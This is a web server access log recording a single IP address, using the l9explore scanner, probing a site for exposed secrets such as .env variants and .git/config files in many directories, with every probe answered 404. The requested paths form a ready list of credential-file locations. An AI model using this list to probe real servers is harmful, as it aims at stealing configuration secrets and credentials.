179.43.163.250 - - [01/Dec/2024:22:46:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
179.43.163.250 - - [01/Dec/2024:22:46:54 +0100] "HELP" 501 319 "-" "-"
179.43.163.250 - - [01/Dec/2024:22:46:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "l9tcpid/v1.1.0"
179.43.163.250 - - [01/Dec/2024:22:46:56 +0100] "GET /.env.local HTTP/1.1" 404 315 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:22:46:56 +0100] "GET /.gitlab-ci.yml HTTP/1.1" 404 319 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:22:46:56 +0100] "GET /app/.git/config HTTP/1.1" 404 320 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:22:46:57 +0100] "GET /www/.git/config HTTP/1.1" 404 320 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:22:46:57 +0100] "GET /.env.aws HTTP/1.1" 404 313 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:22:46:58 +0100] "GET /config/.env HTTP/1.1" 404 316 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:22:46:58 +0100] "GET /public/.git/config HTTP/1.1" 404 323 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:22:46:58 +0100] "GET /.env.prod HTTP/1.1" 404 314 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:22:46:59 +0100] "GET /dev/.git/config HTTP/1.1" 404 320 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:22:46:59 +0100] "GET /.env.dev.local HTTP/1.1" 404 319 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:22:46:59 +0100] "GET /.env.uat HTTP/1.1" 404 313 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:22:47:00 +0100] "GET /api/.env HTTP/1.1" 404 313 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:22:47:00 +0100] "GET /settings/.env HTTP/1.1" 404 318 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:22:47:00 +0100] "GET /.env.testing.local HTTP/1.1" 404 323 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:22:47:01 +0100] "GET /media/.git/config HTTP/1.1" 404 322 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:22:47:01 +0100] "GET /.env.save HTTP/1.1" 404 314 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:22:47:01 +0100] "GET /.env_sample HTTP/1.1" 404 316 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:22:47:01 +0100] "GET /.env.staging.local HTTP/1.1" 404 323 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:22:47:02 +0100] "GET /core/.git/config HTTP/1.1" 404 321 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:22:47:02 +0100] "GET /api/.git/config HTTP/1.1" 404 320 "-" "l9explore/1.2.2"
179.43.163.250 - - [01/Dec/2024:22:47:02 +0100] "GET /config/.git/config HTTP/1.1" 404 323 "-" "l9explore/1.2.2"
